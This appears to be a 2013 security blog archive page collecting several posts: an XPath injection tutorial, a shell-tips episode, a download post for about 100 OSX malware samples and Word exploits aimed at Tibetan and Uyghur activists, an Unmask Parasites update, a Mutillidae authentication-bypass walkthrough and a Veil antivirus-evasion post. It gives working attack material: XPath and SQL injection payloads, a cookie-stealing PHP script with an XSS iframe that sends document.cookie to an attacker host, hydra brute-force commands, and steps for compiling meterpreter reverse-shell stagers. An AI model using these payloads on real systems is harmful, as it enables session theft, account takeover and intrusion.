Monthly Archives: November 2013

XPATH Injection Tutorial

XPath is a language that has been designed and developed to operate on data that is described with XML. The XPath injection allows an attacker to inject XPath elements in a query that uses this language. Some of the possible goals are to bypass authentication or access information in an unauthorized manner.

We are gonna learn using simple example. Download code from here & put it in your local server directory.(Code is created by Amol Naik )

Sample XML Document which we gonna use:-

<Employees>
<!-- Employees Database -->
  <Employee ID="1">
    <FirstName>Johnny</FirstName>
    <LastName>Bravo</LastName>
    <UserName>jbravo</UserName>
    <Password>test123</Password>
    <Type>Admin</Type>
  </Employee>
  <Employee ID="2">
    <FirstName>Mark</FirstName>
    <LastName>Brown</LastName>
    <UserName>mbrown</UserName>
    <Password>demopass</Password>
    <Type>User</Type>
  </Employee>
  <Employee ID="3">
    <FirstName>William</FirstName>
    <LastName>Gates</LastName>
    <UserName>wgates</UserName>
    <Password>MSRocks!</Password>
    <Type>User</Type>
  </Employee>
  <Employee ID="4">
    <FirstName>Chris</FirstName>
    <LastName>Dawes</LastName>
    <UserName>cdawes</UserName>
    <Password>letmein</Password>
    <Type>User</Type>
  </Employee>
</Employees>

Bypass Authentication:-


Browse to the login.php page; here we can see simple login form.

Bypass Authentication

If the application does not properly filter such input, the tester will be able to inject XPath code and interfere with the query result. For instance, the tester could input the following values:

Username: ' or '1' = '1
Password:  ' or '1' = '1

Bypass Authentication using XPATH injection
Looks quite familiar, doesn't it? Using these parameters, the query becomes:

string(//Employee[uname/text()='' or '1' = '1' and passwd/text()='' or '1' = '1']/account/text())

As in a common SQL Injection attack, we have created a query that is always evaluated as true, which means that the application will authenticate the user even if a username or a password have not been provided.


Blind Xpath Injection:-


If there is no knowledge about the XML data internal details and if the application does not provide useful error messages that help us reconstruct its internal logic, it is possible to perform a Blind XPath Injection attack whose goal is to reconstruct the whole data structure.

Browse to the search.php page. Enter any number, When you provide number it will display FirstName related to their ID.

Blind XPATH Injection
Enter ' or '1' = '1 in search , & you will get all FirstName regardless of any ID(Number).

Blind XPATH Injection
In blind Xpath injection we have to provide special crafted query to application, if query is true we will get result otherwise we will not get any result.Till now We don`t know about any parent or child node of XML document.

Guessing of parent node:-


Supply following query to application & observe result.

' or substring(name(parent::*[position()=1]),1,1)='a

Nothing append , we don`t get FirstName of users.It means first letter of parent node is not "a". Now supply following query

' or substring(name(parent::*[position()=1]),1,1)='E

Blind XPATH Injection
You get result , It means first letter of parent node is "E"

To guess second letter of parent node supply following query

' or substring(name(parent::*[position()=1]),2,1)='m

Following the same procedure, we can extract the full name of the parent node, which was found to be 'Employee'.

We can also get child node. Browse to the xpath.php page & enter following query.

//Employee[position()=3]/child::node()[position()=4]/text()

get-child-node
You got output from parent node Employee id 3 & child node whose position is 2.

To get whole document put following query.

//Employee

Blind Xpath injection
It`s just concept how to retrieve data from XML document using XPATH injection.XPath contains two useful functions that can help you automate the preceding attack and quickly iterate through all nodes and data in the XML document:

  • count() returns the number of child nodes of a given element, which can be used to determine the range of position() values to iterate over.
  •  string-length() returns the length of a supplied string, which can be used to determine the range of substring() values to iterate over.
I used recon-ng xpath bruteforcer for xpath injection attack & we will get back end XML file.

xapth-bruteforcer

Useful Links & Blind XPATH injection Tools:-

https://www.owasp.org/index.php/XPATH_Injection

https://www.owasp.org/index.php/Blind_XPath_Injection

XPATH BLIND EXPLORER:-  http://code.google.com/p/xpath-blind-explorer/downloads/list

XCAT:-  https://github.com/orf/xcat

Episode #172: Who said bigger is better?

Tim sweats the small stuff

Ted S. writes in:

"I have a number of batch scripts which turn a given input file into a configurable amount of versions, all of which will contain identical data content, but none of which, ideally, contain the same byte content. My problem is, how do I, using *only* XP+ cmd (no other scripting - PowerShell, jsh, wsh, &c), replace the original (optionally backed up) with the smallest of the myriad versions produced by the previous batch runs?"

This is pretty straight forward, but it depends on what we want to do with the files. I assumed that the larger files should be deleted since they are redundant. This will leave us with only the smallest file in the directory. Let's start off by listing all the files in the current directory and sort them by size.

C:\> dir /A-D /OS /b
file3.txt
file2.txt
file1.txt
file4.txt

Sorting the files, and only files, in the current directory by size is pretty easy. The "/A" option filters on the object's properties and directories are filtered out with "-D". Next, the "/O" option is used to sort and the "S" tells the command to sort putting the smallest files first. Finally, the "/b" is used to show the bare format.

At this point we have the files in the proper order and in a nice light format. We can now use a For loop to delete everything while skipping the first file.

C:\> for /F "tokens=* skip=1" %i in ('dir /A-D /OS /b') do @del %i

Here is the same functionality in PowerShell:

PS C:\> Get-ChildItem | Where-Object { -not $_.PSIsContainer } | Sort-Object -Property Length | Select-Object -Skip 1 | Remove-Item

This is mostly readable. The only exception is the "PSIsContainer". Directories are container objects but files are not, so we filter out the containers (directories). Here is the same command shortented using aliases and positional parameters:

PS C:\> ls | ? { !$_.PSIsContainer } | sort Length | select -skip 1 | rm

There you go Ted, and in PowerShell even though you didn't want it. Here comes Hal brining something even smaller you don't want.

Hal's is smaller than Tim's... but less sweaty

Tim, how many times do I have to tell you, smaller is better when it comes to command lines:

ls -Sr | tail -n +2 | xargs rm

It's actually not that different from Tim's PowerShell solution, except that my "ls" command has "-S" to sort by size as a built-in. We use the "-r" flag to reverse the sort, putting the smallest file first and skipping it with "tail -n +2".

If you're worried about spaces in the file names, we could tart this one up a bit more:

ls -Sr | tail -n +2 | tr \\n \\000 | xargs -0 rm

After I use "tail" to get rid of the first, smallest file, I use "tr" to convert the newlines to nulls. That allows me to use the "-0" flag to "xargs" to split the input on nulls, and preserves the spaces in the input file names.

What may be more interesting about this Episode is the command line I used to create and re-create my files for testing. First I made a text file with lines like this:

1 3
2 4
3 1
4 2

And then I whipped up a little loop action around the "dd" command:

$ while read file size; do 
dd if=/dev/zero bs=4K count=$size of=file$file;
done <../input.txt

3+0 records in
3+0 records out
12288 bytes (12 kB) copied, 6.1259e-05 s, 201 MB/s
4+0 records in
4+0 records out
16384 bytes (16 kB) copied, 0.000144856 s, 113 MB/s
1+0 records in
1+0 records out
4096 bytes (4.1 kB) copied, 3.4961e-05 s, 117 MB/s
2+0 records in
2+0 records out
8192 bytes (8.2 kB) copied, 4.3726e-05 s, 187 MB/s

Then I just had to re-run the loop whenever I wanted to re-create my test files after deleting them.

OSX malware and exploit collection (~100 files) + links and resources for OSX malware analysis



'Tis the season.

Here is a nice collection of ~100 Mac OS malware and Word document exploits carrying MacOS payload (all are CVE-2009-0563) along with links for OSX malware analysis.

Please send your favorite tools for OSX if they are not listed.




CVE-2009-0563

CVE-2009-0563
Stack-based buffer overflow in Microsoft Office Word 2002 SP3, 2003 SP3, and 2007 SP1 and SP2; Microsoft Office for Mac 2004 and 2008; Open XML File Format Converter for Mac; Microsoft Office Word Viewer 2003 SP3; Microsoft Office Word Viewer; and Microsoft Office Compatibility Pack for Word, Excel, and PowerPoint 2007 File Formats SP1 and SP2 allows remote attackers to execute arbitrary code via a Word document with a crafted tag containing an invalid length field, aka "Word Buffer Overflow Vulnerability."



Links



Some OSX malware analysis tools and links 


Tools


Malware in the provided package - links to research and news articles






Download



Download. Email me if you need the password
OSX_CrisisB_a32e073132ae0439daca9c82b8119009 
Additional older downloads

  1. OSX_Docklight payload  http://contagioexchange.blogspot.com/2012/05/019-speechdoc-macosxms09-027a-word.html 
  2. misc OSX malware on contagio http://contagiodump.blogspot.com/search/label/-%20OSX
  3. 30 samples of ancient Mac OS malware http://contagiodump.blogspot.com/2012/04/osxflashbackk-sample-mac-os-malware.html



List of files provided in this post


  1. OSX_AoboKeylogger_362D5DDB3924C625589B42030B66CA69
  2. OSX_BackTrack-A_B03276BFBF85CFDD7C8998004C1200DA
  3. OSX_Boonana_B3A0B0DA5AA01FF200CEBC8AF359A3C3
  4. OSX_ChatZum_487E5CD581587D63783CDD356DE9CF24
  5. OSX_ChatZum_57A4EB15CAA4FCC0A8F6AFBBD66C4859
  6. OSX_Clapzok_99FE5AD5FF514F5AAEA8E501DDBAF95B
  7. OSX_Crisis_04BBDA5B11FA0FD3C767CAF4719D6A4D
  8. OSX_Crisis_42C112036E319ED8DF0F55C7F4C0DA85
  9. OSX_CrisisBOSX_CrisisB_a32e073132ae0439daca9c82b8119009 _a32e073132ae0439daca9c82b8119009 
  10. OSX_Crisis_59FE83E0AE12E085E0FA301ECCA6776F
  11. OSX_Crisis_6F055150861D8D6E145E9ACA65F92822
  12. OSX_Crisis_A32E073132AE0439DACA9C82B8119009_Biglietto Visita
  13. OSX_Crisis_ACEC5F00057D3EC94849511F3EDDCB91
  14. OSX_Crisis_FAAB883598C8C379ACFD0B9DCCC93D0C
  15. OSX_Dockster_Backdoor_C6CA5071907A9B6E34E1C99413DCD142
  16. OSX_FkCodec_74812C7B6E0A55347284ABFA7D5670BF
  17. OSX_FkCodec_74812C7B6E0A55347284ABFA7D5670BF_Codec-M
  18. OSX_FkCodec_B4ECE10D1E706B87B065523A654D48A7_download.dmg
  19. OSX_FkCodec1C5AE9F1DD9FE6F506EAABD382925CA8_codec-M.safariextz
  20. OSX_Flashback_3DCB6D6A9EA8D9755EB61AE057B3D74A
  21. OSX_Flashback_9FCFE8EF92F51F1C29A26E1516EF7003_FlashPlayer-11-macos.pkg
  22. OSX_Flashback_C2819C3C183BBF7547CF76C6A004EA15_FlashPlayer-11-macos.pkg
  23. OSX_Fucobha_IceFog_A615DD792093191E9FC975132A2DB409A_CleanMyMac
  24. OSX_Fucobha_IceFog_B4249F9B49A9A177B4D2F4439373029A
  25. OSX_Fucobha_IceFog_CF1815491D41202EB8647341A8695E1E
  26. OSX_GetShell_68078CBD1A34EB7BE8A044287F05CCE4
  27. OSX_GetShell_AC99ACE403D31C7079C938F9B0FD0895
  28. OSX_GetShell_ACC2B4A595939F17F7D07DE2CF75CDC8
  29. OSX_Hacktool_Hoylecann_FED8E22AE6F080F9B05A309C7E48B5EF
  30. OSX_HellRaiser_CA74984601287459AFB7B39EBEBDD394
  31. OSX_HellRTS.AH_KeystrokeRecorder X Pref Editor_C19377D07A234D1585D85F8FA3CF77FB
  32. OSX_HellRTS_F1AD75AEB4B4C2883DF2221C8804DA2A.AH
  33. OSX_Hovdy_Backdoor_FED713CAC7012D25F60B236E6DDCF513
  34. OSX_Inqtana.zip
  35. OSX_Iservice_4C9E7EE7C0F5C19C68B45CA6C81F8D62
  36. OSX_Iservice_E34BA325F3EEB8DF07A09EE9FBF1071D
  37. OSX_Jahlav_12F32EACBB3CD2C5623EE6976A51913A_QuickTime.xpt
  38. OSX_Jahlav_CCB72243EF478EEFE90B5898EC32389B
  39. OSX_Jahlav_D7DDF72D17F889C2C5B302AC0A5FBDC5
  40. OSX_Jahlav_FB79A75A6152EF47BBF88AE8544545CC.pl
  41. OSX_Jahlav_flash.zip
  42. OSX_Kitmos_A_39FAA22EB9D6B750EC345EFCB38189F5
  43. OSX_Kitmos_A_3AA9C558D4D5F1B2A6D3CE47AA26315F
  44. OSX_Kitmos_A_B3D49091875DE190F200110C2F2032D4
  45. OSX_Lamadai_20F0D0CE8A413A51EB16DEE860021E6A
  46. OSX_Lamadai_DE90189F040494E3708D83A33E37E40E
  47. OSX_Leverage_A_Backdoor_C425D2BE8B4AF733A44EC1518F182BE8
  48. OSX_LocalRoot_3DC01743FB42E917E9F9EDE5009F10CD
  49. OSX_Macarena_A_BFC7B7B9D3E1DF9D6E1A31D3E7BED628
  50. OSX_MacDefender_8AE7163C7C3C02564A4C69DF1F7C483E_Archive.pax
  51. OSX_MacDefender_E187F4071723808560E135647245562A_Archive.pax
  52. OSX_MacKontrol_89C35C057655E67580EFD0FF8242D960
  53. OSX_MacKontrol_E88027E4BFC69B9D29CAEF6BAE0238E8_matiriyal.dmg
  54. OSX_Macsweeper_4836CC480796386ED6929C38E5AAD525
  55. OSX_Miner_DevilRobber_417369B713F1A5F3A3DC0DAF76BDCFD6
  56. OSX_Miner_DevilRobber_EE2BA586232007FA41703EB120AC7408
  57. OSX_Miner_F8EBF03E88928EBF91A8420E3D5993FE
  58. OSX_Olyx_Backdoor_93A9B55BB66D0FF80676232818D5952F
  59. OSX_Olyx_Backdoor_93A9B55BB66D0FF80676232818D5952F_Current events 2009 July 5
  60. OSX_OpinionSpy_C98AE54F4BE1082B4E82548D7511077E_Crystal-Clock-screensaver.zip
  61. OSX_OpinionSpy_CC33C95C59372AFCA60A0552A58D0EF8_Crystal-Clock-screensaver.zip
  62. OSX_PSides_32F4792B1141BA259067F9613E2E88B5
  63. OSX_PUP_AABEDBAAB63EF19657A3A82C930CCE18_Genieo_InstallGenieo.dmg
  64. OSX_PUP_PerfectKeylog_1B192319C8F41036A2D6B8E987809D42
  65. OSX_Renepo_80753666A54A8AE97BD6ED3A4E2F3702
  66. OSX_RevirA_FE4AEFE0A416192A1A6916F8FC1CE484_revir-a.dmg
  67. OSX_RevirC_Imuler_7DBA3A178662E7FF904D12F260F0FFF3
  68. OSX_Safari_B24C0E60AF3D3E836FBE8A92FBCC8EB7.dat
  69. OSX_SniperSpy
  70. OSX_Wirenet_50D4F0DA2E38874E417BD13B59F4C067
  71. OSX_Wirenet_B56AD86A4BACEF92EF46D36EABEF6467
  72. OSX_Wirenet_D048F7AE2D244A264E58AF67B1A20DB0
  73. OSX_Yontoo_16ACCB0ABC051D667640B1EE4FF3A7A1
  74. OSX_Yontoo_7C433B3AC0E8072BA5E6B57298E1B28B
  75. OSXWeapoX_7FDEBB5FEC63FB3739A79A66265BB765



EXPLOITS
OSX_CVE-2009-0563 targeting Tibetan and Uyghur activists (filenames shortened here)

  1. 0DA957B9B952420241F945A9A2C52A50_C2-alma.apple.cloudns.org_ParticipantsArrivalDeparture.doc
  2. 0E5110493FD197813068310E57467B44_C2-alma.apple.cloudns.org _Uighur Han unrest.doc
  3. 0E945428D07464EC33EBDFF5712FE788_C2-update.googmail.org_Jenwediki yighingha.doc
  4. 1218840F3B66832CC58C33C75AD3D419_C2-update.googmail.org_Uyghur_Xitayning Yengi Rehberlik.doc
  5. 1CE3C4A8907A242250D366586711CBDC_C2-alma.apple.cloudns.org _Rabiye_hanim_bilen_Dolkun_Isa.doc
  6. 2567399683111CFCB838C5DA80DF181D_Tibetan Parliament urges World to take concrete step on Tibet.doc
  7. 28821C5FD38B11EE630D87961C11A3D7_DUQning reyisi namzatlar isimliki.doc
  8. 3D28AE551B9BD4C62FFC6C72F5668D96_Tibet_The United Nations Commission for Human Rights.doc
  9. 3D90D04C09C6B4D5D52888C89BDE9685_Tibetan Parliament urges World.doc
  10. 567ECE88B2D6F4F12F0D0760C30605EE_C2-apple12.crabdance.com_list.doc
  11. 58A0A5824A6B30EA7EEBBB51818AE04B_uYGHUR_Jenwe yinghinining xeweri.doc
  12. 786A7D1A1DCEC50E6A89E3CC8F33A3AE_Uyghur_Dunya Uyghur Qurultayigha iane qilish toghrisida.doc
  13. 7D7A5C530A7DBF24C42145A0EFCC8669_kurban-bayrami.doc
  14. 8618BCCB98F7D20634EBEDC488981E86_C2-update.googmail.org_email73.doc
  15. 908116A30F53EDF9D1749E3F0F267680_Website-TGSL.doc
  16. 9F9F96D5C882528D08315201042647DF_C2-update.googmail.org_Uyghur_The Duke Program.doc
  17. BA76DE3471497A8B1858AF4A8C700AE1_www.uyghurcongress.org.doc
  18. C024E159A96F3292915B257070FC3325_Sartin-TGSL.doc
  19. DD7C486BC17772A5E96425271FA5ED4D_c2-apple12.crabdance.com_10. Jahresgedenktag.doc
  20. E510AE50B0344EFBE1F8888771C7446C_www.tughlan.com.doc
  21. E683339BCCFDEB0F06C7E567F2C284C5_Planning for action.doc
  22. ECE44C00D46BE019AFF38FD5D31B9110_C2-update.googmail.org_UAA 2012 Saylam Komtiti saylam.doc
  23. F81775C93F7337E0664F1D106E13C7B3_C2-update.googmail.org_Uyghur_Human Rights Education.doc
  24. FBE399BF714184ED7FEA313F36A86514_C2-apple12.crabdance.com_Uyghur_Putun Dunyadiki Sherqi.doc
  25. MacOSSabpub-A_43F281076E185E55BECE7EB2F0EC8164.doc


Reporting Suspicious Styles

Back in 2008, the very first task that I created Unmask Parasites for was scanning web pages for hidden links.

I read an article about thousands of WordPress blogs being stuffed with dozens of invisible spammy links. I had a self-hosted WordPress blog too and that article made me think if there was some easy way to figure out whether my blog was hacked, something less laborious than manually examining the HTML code link by link. So I decided to create a tool that would show all domains that my web pages linked to highlighting those of them that had “invisible” styles. This approach has proved to be very efficient in identifying black hat SEO hacks. In most cases, a glance is enough to spot such problems.

It works well even when the tool doesn’t highlight links as “hidden” (either because the “hiding rule” was not detected or because it scanned the “cloaked” page created specifically for search engines). You can still see the links that clearly don’t belong to your site, which tells you that something’s wrong.

However, looking for suspicious links is not the bullet-proof method for detecting spam injection issues. For example, in my yesterday’s post on Sucuri blog, I wrote about fake WordPress plugins that used to injects spammy links and a JavaScript code into web pages. However, at the moment, they inject some hidden spammy auto-generated text that doesn’t have any links.

spammy block

You can use this Google query to reveal affected sites [cigarettes AND (“3200 unhealthy” OR “3300 hazardous”)]

I don’t know why they do it, but webmasters should definitely be warned about such injections because it’s a sign of a problem that should be fixed as soon as possible. This is actually more serious than just a factor that can potentially affect site’s search ranking. Those fake plugins fetch the spammy content from remote servers and inject it into blog pages on the fly. This means that hackers can change it any time and the same moment the new spammy block will be injected into all compromised sites. Or it can be a malicious block, which makes things more serious as it will affect all visitors to those sites too.

Unfortunately, such injections were not reported by Unmask Parasites since there were no links in the spammy block. After thinking about the problem, I decided that Unmask Parasites should also report pure HTML tricks such as that clip:rect style trick that hackers use to hide their injections.

So , starting this week, you may see the “Suspicious Styles” section in Unmask Parasites reports.

suspicous style

In this section, you will see excerpts of the style definitions that Unmask Parasites considers suspicious. If you see it in your site reports, then you should check the HTML code of your pages and figure out whether that style is a normal part of your pages or it was added there to hide something illicit.

Note, if you can’t find such code in your web pages, it doesn’t mean it is not there. The code injection can be conditional, and server files may fetch it from a remote location (as in this case with fake WordPress plugins), or it can be encrypted. Just remember that Unmask Parasites works in real time (some results may be cached for up to an hour) and if it reports something, then you can be sure it was on a web page at the moment of scanning.

To Unmask Parasites users

If you like Unmask Parasites and want to help improve it, you can inform me about interesting tricks that hackers use to hide injected content Or send me examples of infected web pages where Unmask Parasites doesn’t report any problems.

Thanks!

Related posts:

Is MAM Identity and Access Management’s next big thing?

Mobile Application Management is making waves. Recent news from Oracle, IBM, and Salesforce highlight the market interest. It's a natural extension of what you've been hearing at Identity trade shows over the past few years (and this year's Gartner IAM Summit was no exception). The third platform of computing is not a future state. It's here. And Identity and Access solutions are adapting to accommodate the new use case scenarios. ...onward and upward.

[Update - interesting discussion of the IAM technology stack for mobile by SIMIEO]

Broken Authentication & Session Management in Mutillidae

Broken Authentication and Session Management is on number 2 in OWASP Top 10 vulnerability list 2013. In mutillidae , it contain three subsection.

  • Authentication Bypass
  • Privilege Escalation
  • Username Enumeration

We have already covered Username enumeration in last article & we got valid username list which exist in database. Today we are going to use authentication bypass method.

  1. Using cookie
  2. Using brute-force
  3. Using SQL injection

(1)Authentication Bypass using cookie:- 

As we know that , mutillidae is vulnerable to XSS, so we can capture cookie with help of XSS. We are going to take advantage of persistent XSS.

http://127.0.0.1/mutillidae/index.php?page=add-to-your-blog.php

Above link is vulnerable to persistent XSS attack. We can submit html to add blog section.so we are going to use cookie-catcher.

Content of cookie_catcher.php :-

<?php
header ("Location: http://192.168.56.1");
$cookie = $_GET['c'];
$ip = getenv ('REMOTE_ADDR');
$date=date("j F, Y, g:i a");;
$referer=getenv ('HTTP_REFERER');
$fp = fopen('cookies.html', 'a');
fwrite($fp, 'Cookie: '.$cookie.'<br> IP: ' .$ip. '<br> Date and Time: ' .$date. '<br> Referer: '.$referer.'<br><br><br>');
fclose($fp);
?>

Upload your cookie_catcher.php to server. For demo i used my local apache server & after execution of script it will redirect to 192.168.56.1.You can change the code according to your need. It will grab IP, cookie, Referer, time & date.

Now as anonymous user , we will add blog entry.I used other OS on my virtual box for attack.

(1)Open http://192.168.56.1/mutillidae/index.php?page=add-to-your-blog.php

(2)Submit following html to blog

<html>
<body>
<b> nirav k desai</b>
<u>help me</u>
<iframe frameboarder=0 height=0 width=0 src=javascript:void(document.location="http://192.168.56.1/cookie_catcher.php?c="+document.cookie) </iframe >
</body>
</html>

authentication-bypass-using-cokkie

Replace Link http://192.168.56.1/cookie_catcher.php to your uploaded cookie_catcher.php

(3)Now when "admin" or any "logged user" show your added blog entry , you will get his cookie, i.p., date & time.

persistent-xss

(4)To view cookie open cookie.html.

cookie-catcher
 
(5)Now you can use any cookie manager add-on to edit cookie; replace cookie which we got.

cookie-manager

(6)After reload we got admin access to web-application.

admin-access

(2)Authentication Bypass Using bruteforce:- 

You can use hydra or burpe intruder to bruteforce login form of application.

hydra -l admin -P /root/pass.txt  127.0.0.1 http-post-form "/mutillidae/index.php?page=login.php:username=^USER^&password=^PASS^&login-php-submit-button=Login:Not Logged In"

Bruteforce-Using-Hydra

(3)Authentication Bypass Using sql injection:- 

We can inject special database characters or SQL timing attacks into page parameters. We are going to use login page; and inject sql character to  login form.

You can use SQL injection cheat sheet & we will brute-force  using SQL statements.Save it to file.

hydra -l admin -P /root/sql 127.0.0.1 http-post-form "/mutillidae/index.php?page=login.php:username=^USER^&password=^PASS^&login-php-submit-button=Login:Not Logged In"

SQL-injection_cheat-sheet

And we got for valid SQL statements ; with help of it we can bypass admin panel.

How to solve compile error in veil?

As you know, veil is AV evasion framework for metasploit payload. On the 15th of every month, for the next year, at least one new payload module will be released.Yesterday they released two new payload.

  1. pure windows/meterpreter/reverse_tcp stager, no shellcode
  2. pure windows/meterpreter/reverse_tcp windows service stager compatible with psexec, no shellcode

Compiler Error in c payloads:-


 Available c payloads:

    VirtualAlloc                         Poor
    VoidPointer                         Poor
    meter_rev_tcp                     Excellent
    meter_rev_tcp_service        Excellent

c/meter_rev_tcp

I used c/meter_rev_tcp. After setting of LHOST & LPORT ; when i try to generate it ; i got error.

sh: i686-w64-mingw32-gcc: command not found

i686-w64-mingw32-gcc

Okay now we successfully generated payload file, but we get compiler error while compiling into cross-platform exe.

Error clearly suggest that i686-w64-mingw32-gcc is not installed.The mingw-w64 project is a complete run-time environment for gcc to support binaries native to Windows 64-bit and 32-bit operating systems.In short, to compile the payload for 64 bit windows ; we have to install mingw-w64. 

In case of 32 bit windows os , we can compile it,because when you setup veil environment mingw32 installed using wine.

Compile payload for 32 bit:-


root@bt:~# cd .wine/drive_c/MinGW/bin/

root@bt:~/.wine/drive_c/MinGW/bin# wine mingw32-gcc.exe /root/veil-output/source/output.c -lwsock32  -o output.exe

mingw32-gcc

So our payload is compiled into exe for 32 bit windows.

Compile payload for 64 bit:-


For this purpose you have to install mingw32-w64.

Download from here & build it.If you don`t want to install it; then you can use pre-compiled version.

root@bt:/media/tools/mingw-w64-bin_i686-linux_20111031_sezero/cross_win64/bin# ./x86_64-w64-mingw32-gcc /root/veil-output/source/output.c -lwsock32 -o output.exe

I don`t test compiled exe  in 64 bit, so if anyone use it, please let me know exe is working or not.

If you want to build MinGW-w64 for Win32 and Win64 using automated bash script, click here.

Compiler error in C#:-

Available c# payloads:

    VirtualAlloc                   Poor
    b64SubVirtualAlloc       Normal

b64SubVirtualAlloc

root@bt:~/Downloads/Veil-master# ./Veil.py -l c# -p b64SubVirtualAlloc --msfpayload windows/meterpreter/reverse_tcp -o payload --msfoptions LHOST=192.168.56.101 LPORT=443

Our source file has been generated and got following error.
error CS2007: Unrecognized command-line option: `-platform:x86'

error CS2007

gmcs /root/veil-output/source/payload.cs 

error CS2007

Now our exe is generated,it`s in same source folder.

Username Enumeration in Mutillidae using Burpe Intruder.

Mutillidae  is a free, open source, vulnerable web-application providing a target for web-security tester. Mutillidae can be installed on Linux and Windows using LAMP, WAMP, and XAMMP.

Username Enumeration :- We have an application that will reveal to us when a username exists on the system which can be used in further step like brute-force account.

In Mutilliade login page , when you provide valid username & invalid password , web-application reply us that password incorrect.

Username Enumeration


When we provide invalid username ; then application tell us that Account does not exist.

Username Enumeration Mutillidae

So by monitoring web-application message one can know that username is valid or not.

First we will examine source code of page ; when we provide valid username reply is "var lAuthenticationAttemptResultFlag = 1" & when we provide invalid username reply is "var lAuthenticationAttemptResultFlag = 0"

var lAuthenticationAttemptResultFlag = 1    It means username exist.

var lAuthenticationAttemptResultFlag = 0    It means username does not exist.



Alternatively we can do this by saving both page (valid username & invaild username) source code in text file & then use diff command.

root@bt:~# diff login password
762c762
< var lAuthenticationAttemptResultFlag = 0;
---
> var lAuthenticationAttemptResultFlag = 1;

Now Open burpe suite, setup listener ; try to sign in from browser & capture request.

Burpe-Request

Now right click on request & click on send  to inrtuder.

For position we choose only username.

Burpe-Intruder

On payload tab  ---) payload option  ----) load sample username list.

Intruder-Payload

In option tab      ---)    Grep match     ---) Add
var lAuthenticationAttemptResultFlag = 1; var lAuthenticationAttemptResultFlag = 0;

Intruder-Option

Click on intruder ---) start Attack

Now Burpe make request to login page & examine request & classified responce according to option which we provided.

Intruder-Attack

Click on save , result table & Delimiter click on custom & put ";" ,then select column which we need , in this case i select payload,var lAuthenticationAttemptResultFlag = 1,var lAuthenticationAttemptResultFlag = 0 and then save it.

Intruder-Result

Saved file is look like following format.

Intruder-saved-file

In file first is username ; then true means username exist , false menas username is invalid. So now we only need entry which second column is true.

Possible-Username

So i saved this value in another temp file from where you can extract username from file using delimiter. I used simple python script for this purpose.

Username List
Finally we got list of username which exist on system.